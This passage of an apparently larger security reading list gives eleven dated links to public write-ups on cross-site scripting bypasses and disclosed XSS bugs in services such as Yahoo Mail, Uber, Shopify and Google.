    609 - [Using a Braun Shaver to Bypass XSS Audit and WAF - Frans Rosen - April 19, 2016](http://web.archive.org/web/20160810033728/https://blog.bugcrowd.com/guest-blog-using-a-braun-shaver-to-bypass-xss-audit-and-waf-by-frans-rosen-detectify)
    610 - [Ways to alert(document.domain) - Tom Hudson (@tomnomnom) - February 22, 2018](https://gist.github.com/tomnomnom/14a918f707ef0685fdebd90545580309)
    611 - [Write-up of DOMPurify 2.0.0 bypass using mutation XSS - Michał Bentkowski - September 20, 2019](https://web.archive.org/web/20250810032340/https://research.securitum.com/dompurify-bypass-using-mxss/)
    612 - [XSS by Tossing Cookies - WeSecureApp - July 10, 2017](https://web.archive.org/web/20260107083030/https://wesecureapp.com/blog/xss-by-tossing-cookies/)
    613 - [XSS ghettoBypass - d3adend - September 25, 2015](https://web.archive.org/web/20150925094640/http://d3adend.org:80/xss/ghettoBypass)
    614 - [XSS in Uber via Cookie - zhchbin - August 30, 2017](https://web.archive.org/web/20260206200641/https://zhchbin.github.io/2017/08/30/Uber-XSS-via-Cookie/)
    615 - [XSS on any Shopify shop via abuse of the HTML5 structured clone algorithm in postMessage listener - Luke Young (bored-engineer) - May 23, 2017](https://web.archive.org/web/20260216061600/https://hackerone.com/reports/231053)
    616 - [XSS via Host header - www.google.com/cse - Michał Bentkowski - April 22, 2015](https://web.archive.org/web/20150503190425/http://blog.bentkowski.info:80/2015/04/xss-via-host-header-cse.html)
    617 - [Xssing Web With Unicodes - Rakesh Mane - August 3, 2017](https://web.archive.org/web/20260217134740/https://blog.rakeshmane.com/2017/08/xssing-web-part-2.html)
    618 - [Yahoo Mail stored XSS - Jouko Pynnönen - January 19, 2016](https://web.archive.org/web/20210507223107/https://klikki.fi/adv/yahoo.html)
    619 - [Yahoo Mail stored XSS #2 - Jouko Pynnönen - December 8, 2016](https://web.archive.org/web/20210816155224/https://klikki.fi/adv/yahoo2.html)